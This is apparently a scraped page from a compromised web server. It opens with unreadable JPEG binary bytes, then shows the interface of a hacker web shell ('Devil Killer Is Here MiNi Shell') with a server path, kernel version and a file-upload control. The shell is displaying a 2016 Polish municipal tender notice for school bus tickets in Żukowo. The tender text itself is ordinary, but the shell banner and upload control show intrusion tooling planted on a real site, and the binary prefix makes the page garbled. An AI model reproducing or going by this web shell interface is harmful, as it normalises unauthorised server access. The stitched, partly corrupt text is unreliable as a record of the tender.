JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161118/346462-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.zukowo.pl' target='_blank'>http://bip.zukowo.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 346462 - 2016
              z dnia 2016-11-18 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żukowo: Zakup biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów na terenie Gminy Żukowo w ramach świadczenia usługi regularnego przewozu osób na liniach komunikacyjnych obejmujących miejscowości z których dojeżdżają uczniowie do szkół wraz z zapewnieniem opieki w czasie przewozu <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Żukowo, krajowy numer identyfikacyjny
              , ul.
              ul. Gdańska 
              52,
              83330  
              Żukowo, woj.
              pomorskie, państwo
              Polska, tel.
              +48 58 6858300, e-mail
              , faks
              +48 58 6858300.
              <br />
              Adres strony internetowej (URL): http://bip.zukowo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zukowo.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę nalezy złożyć w formie pisemnej. Wykonawca winien zamieśic ofertę w kopercie, która będzie posiadała oznaczenie OFERTA  Zakup biletów miesięcznych dla uczniów część ..  Nr postępowania ZP.271.48.2016<br />
                Adres:
                <br />Gmina Żukowo Urząd Gminy Żukowo  ul. Gdańska 52, 83  330 Żukowo </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów na terenie Gminy Żukowo w ramach świadczenia usługi regularnego przewozu osób na liniach komunikacyjnych obejmujących miejscowości z których dojeżdżają uczniowie do szkół wraz z zapewnieniem opieki w czasie przewozu <br /><b>Numer referencyjny: </b>ZP. 271.48.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zakup biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów na terenie Gminy Żukowo w ramach świadczenia usługi regularnego przewozu osób na liniach komunikacyjnych obejmujących miejscowości z których dojeżdżają uczniowie do szkół wraz z zapewnieniem opieki w czasie przewozu w podziale na zadania częściowe:
Część I  - obejmująca uczniów dojeżdżających z miejscowości: Widlino, Sulmin, Niestępowo, Babi Dół, Skrzeszewo, Lniska, Elżbietowo, Glincz, Leźno, Czaple, Skrzeszewo Piaski, Łapino, Przyjaźń, Mała Przyjaźń, Otomino, Borkowo
Część II -  obejmująca uczniów dojeżdżających do szkół z miejscowości: Chwaszczyno, Barniewice, Rębiechowo, Banino, Dąbrowa,  Pępowo, Małkowo, Miszewo, Miszewko, Barniewice
<br /><br /><b>II.5) Główny kod CPV: </b>60000000-8<br /><b> Dodatkowe kody CPV:</b>60112000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                2.	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust 1 pkt 6 ustawy PZP . Zamówienie może być udzielone dotychczasowemu wykonawcy, w okresie 3 lat od udzielenie  zamówienia podstawowego i będzie polegać na powtórzeniu podobnych usług ( usług związanych z zakupem biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów na terenie Gminy Żukowo w ramach świadczenia usługi regularnego przewozu osób na liniach komunikacyjnych obejmujących miejscowości z których dojeżdżają uczniowie do szkół wraz z zapewnieniem opieki w czasie przewozu ). Udzielenie zamówienia zostanie poprzedzone przeprowadzonymi negocjacjami z wykonawcą zamówienia podstawowego (adekwatnie do danej części)  podczas których strony będą negocjować warunki przyszłej umowy. Dla potrzeb  postępowania udzielanego  na podstawie art. 67 ust1 pkt 6 ustawy PZP zamawiający przewidział ewentualny zakres świadczenia usługi  w ramach tego zamówienia w wymiarze  nie przekraczającej 5 % wartości szacunkowej zamówienia podstawowego dla danej części.  <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b>Realizacji zamówienia nastąpi w dni nauki szkolnej  okresie od dnia zawarcia umowy nie wcześniej niż od dnia.02.01.2017  </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Warunek dla części I i II :   
Wykonawca posiada aktualną licencję na wykonywanie transportu drogowego osób wydaną na podstawie ustawy z dnia 6 września 2001 roku o transporcie drogowym lub licencję wspólnotową zezwalającą na świadczenie usług objętych niniejszym zamówieniem
<br />
                Informacje dodatkowe
                W przypadku  oferty składanej wspólnie przez wykonawców ocena spełnienia warunku - każdy podmiot realizujący zamówienie w sposób czynny winien posiadać takie zezwolenie<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                ba)  zdolność techniczna:
część I 
Wykonawca dysponuje min  5 autobusami  miejskimi niskopodłogowymi  z liczbą miejsc łącznie min.79, rok produkcji  2005 lub młodszy;  o długości max13 m ; wyposażone w urządzenia ułatwiające  dostęp  dla osób niepełnosprawnych (osób o ograniczonej zdolności poruszania się oraz poruszających się na wózkach inwalidzkich)  w szczególności .:
- rampa- pochylnia dla wózków (nie dopuszcza się stosowania urządzeń przenośnych);
-   tzw. przyklęk  umożliwiający obniżenie poziomu podłogi co najmniej 60 mm; 
-  co najmniej jedno miejsce na wózek inwalidzki,
-  co najmniej jedno wejście  powinno być dostosowane  do potrzeb osób o ograniczonej zdolności poruszania się oraz poruszających się na wózkach inwalidzkich (szersze wejście ) 

część II 
Wykonawca dysponuje min  5 autobusami  miejskimi niskopodłogowymi  z liczbą miejsc łącznie min.79, rok produkcji  2005 lub młodszy;  o długości max13 m ; wyposażone w urządzenia ułatwiające  dostęp  dla osób niepełnosprawnych (osób o ograniczonej zdolności poruszania się oraz poruszających się na wózkach inwalidzkich)  w szczególności .:
- rampa- pochylnia dla wózków (nie dopuszcza się stosowania urządzeń przenośnych);
-   tzw. przyklęk  umożliwiający obniżenie poziomu podłogi co najmniej 60 mm; 
-  co najmniej jedno miejsce na wózek inwalidzki,
-  co najmniej jedno wejście  powinno być dostosowane  do potrzeb osób o ograniczonej zdolności poruszania się oraz poruszających się na wózkach inwalidzkich (szersze wejście ) 

W przypadku składania oferty na dwie części  - wykonawca powinien wykazać się, iż dysponuje co najmniej 8 autobusami miejskimi niskopodłogowymi  z liczbą miejsc łącznie min.79, rok produkcji  2005 lub młodszy;  o długości max13 m ; wyposażone w urządzenia ułatwiające  dostęp  dla osób niepełnosprawnych (osób o ograniczonej zdolności poruszania się oraz poruszających się na wózkach inwalidzkich)  w szczególności .:
- rampa- pochylnia dla wózków (nie dopuszcza się stosowania urządzeń przenośnych);
-   tzw. przyklęk  umożliwiający obniżenie poziomu podłogi co najmniej 60 mm; 
-  co najmniej jedno miejsce na wózek inwalidzki,
-  co najmniej jedno wejście  powinno być dostosowane  do potrzeb osób o ograniczonej zdolności poruszania się oraz poruszających się na wózkach inwalidzkich (szersze wejście ) 


bb)  zdolność zawodowa 
1.	Wykonawca wykaże się następującym doświadczeniem:
Dla części I zamówienia: jedno zamówienie polegające na świadczeniu przez okres co najmniej 5 m-cy usług regularnego przewozu osób w rozumieniu   ustawy z dnia 6 września 2001 r. o transporcie drogowym (o którym mowa w art. 4 pkt 7 cyt  ustawy) w liczbie min. 13.000 kilometrów miesięcznie w ramach danego zamówienia.
Dla części II zamówienia: jedno zamówienie polegające na świadczeniu przez okres co najmniej 5 m-cy usług regularnego przewozu osób w rozumieniu ustawy z dnia 6 września 2001 r. o transporcie drogowym (o którym mowa w art. 4 pkt 7 cyt  ustawy) w liczbie min. 10.000 kilometrów miesięcznie w ramach danego zamówienia.
W przypadku składania oferty na dwie części  - wykonawca powinien wykazać się doświadczeniem: w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał należycie a w przypadku świadczeń ciągłych wykonuje należycie, maksymalnie 2 zamówienia polegające na świadczeniu przez okres co najmniej 5 m-cy usług regularnego przewozu osób w rozumieniu  ustawy z dnia 6 września 2001 r. o transporcie drogowym (o którym mowa w art. 4 pkt 7 cyt  ustawy) o łącznej liczbie min. 23.000 kilometrów miesięcznie w ramach wskazanego doświadczenia.

 Wykonawca ma prawo wykazać się zamówieniami nie  tylko zakończonymi, ale również jeszcze wykonywanymi. W przypadku usług wykonywanych Wykonawca, aby spełnić powyższy warunek jest zobowiązany wykazać zrealizowany zakres zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert  i o wartości wskazanej powyżej.

2.Wykonawca dysponuje do realizacji zamówienia następującymi osobami: 
Część I 
a)min. 5 osobami posiadającymi uprawnienia oraz spełniającymi wymogi dla kierowcy pojazdów przewozu drogowego osób określone w ustawie z dnia 20 czerwca 1997 r.  prawo o ruchu drogowym oraz posiadającymi co najmniej trzyletnie  doświadczenie w prowadzeniu (kierowaniu) takich pojazdów jak autobusy, posiadający  uprawnienia  do kierowania autobusami (prawo jazdy kat. D) , posiada uprawnienia na  przewóz osób zgodnie z obowiązującymi przepisami;
b)min. 5 osobami  opiekunami  podczas dowozu  uczniów (po jednym opiekunie na każdy autobus dowożący dzieci do szkoły),  ukończony kurs udzielania  pierwszej pomocy,  bhp 

część II: 
a)min. 3 osobami posiadającymi uprawnienia oraz spełniającymi wymogi dla kierowcy pojazdów przewozu drogowego osób określone w ustawie z dnia 20 czerwca 1997 r.  prawo o ruchu drogowym oraz posiadającymi co najmniej trzyletnie  doświadczenie w prowadzeniu (kierowaniu) takich pojazdów jak autobusy, posiadający  uprawnienia  do kierowania autobusami (prawo jazdy kat. D) , posiada uprawnienia na  przewóz osób zgodnie z obowiązującymi przepisami;
b)min. 3 osobami - opiekunami  podczas dowozu  uczniów (po jednym opiekunie na każdy autobus dowożący dzieci do szkoły),  ukończony kurs  udzielania pierwszej pomocy,  bhp. 


W przypadku składania oferty na dwie części  - wykonawca powinien wykazać się, iż dysponuje co najmniej:  
min. 8 osobami posiadającymi uprawnienia oraz spełniającymi wymogi dla kierowcy pojazdów przewozu drogowego osób określone w ustawie z dnia 20 czerwca 1997 r.  prawo o ruchu drogowym oraz posiadającymi co najmniej trzyletnie  doświadczenie w prowadzeniu (kierowaniu) takich pojazdów jak autobusy, posiadający  uprawnienia  do kierowania autobusami (prawo jazdy kat. D) , posiada uprawnienia na  przewóz osób zgodnie z obowiązującymi przepisami;

min. 8 osobami - opiekunami  podczas dowozu  uczniów (po jednym opiekunie na każdy autobus dowożący dzieci do szkoły),  ukończony kurs udzielania  pierwszej pomocy,  bhp.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego  rejestru lub  centralnej  ewidencji i informacji  o działalności gospodarczej w celu potwierdzenia  braku podstaw  wykluczenia na podstawie  art. 24 ust 5 pkt 1 ustawy PZP</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)aktualna licencja na wykonywanie transportu drogowego osób wydaną na podstawie ustawy z dnia 6 września 2001 roku o transporcie drogowym lub licencja wspólnotową zezwalającą na świadczenie usług objętych niniejszym zamówieniem.
2)Wykaz usług wykonanych  lub wykonywanych w przypadku usług ciągłych lub okresowych w okresie 3 lat przed upływem terminu  składania ofert  załącznik nr 5 wraz z dowodami określające czy te usługi  zostały wykonane lub są wykonywane należycie
3)Wykaz autobusów  dostępnych wykonawcy w celu wykonania zamówienia  załącznik nr 6
4)Wykaz osób skierowanych  przez wykonawcę do realizacji zamówienia  załącznik nr 7

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie,  iż wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu w zakresie wskazanym w załączniku nr 2A,2B,2C do SIWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.
2)Wykonawca, który  polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując  zamówienie, będzie dysponował  niezbędnymi zasobami tych podmiotów, w  tym celu  wykonawca  składa pisemne zobowiązanie podmiotu do oddania do dyspozycji wykonawcy  niezbędnych zasobów na potrzeby realizacji zamówienia.  
3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców  oświadczenie,  iż wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postepowaniu składa  każdy z wykonawców wspólnie ubiegających się  o zamówienie. Dokument ten te ma potwierdzać spełnienie warunków udziału w postępowaniu, brak podstaw do wykluczenia w zakresie, w którym każdy z wykonawców wskazuje spełnienie warunków udziału w postępowaniu.
4) Zamawiający wymaga wskazania przez Wykonawcę w Formularzu Ofertowym  załącznik nr 1 części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez wykonawcę  firm  podwykonawców.
5)Pełnomocnictwo  jeśli dotyczy
6)Pisemne zobowiązanie podmiotu do oddania do dyspozycji wykonawcy  niezbędnych zasobów na potrzeby realizacji zamówienia   załącznik nr 3 (jeśli dotyczy)
7)Dowód wniesienia wadium
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Część 1 -  16 .000,00 zł  ( słownie szesnaście  tysięcy  złotych 00/100)
Część 2  7.000,00 zł (słownie: siedem tysięcy  złotych 00/100)
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
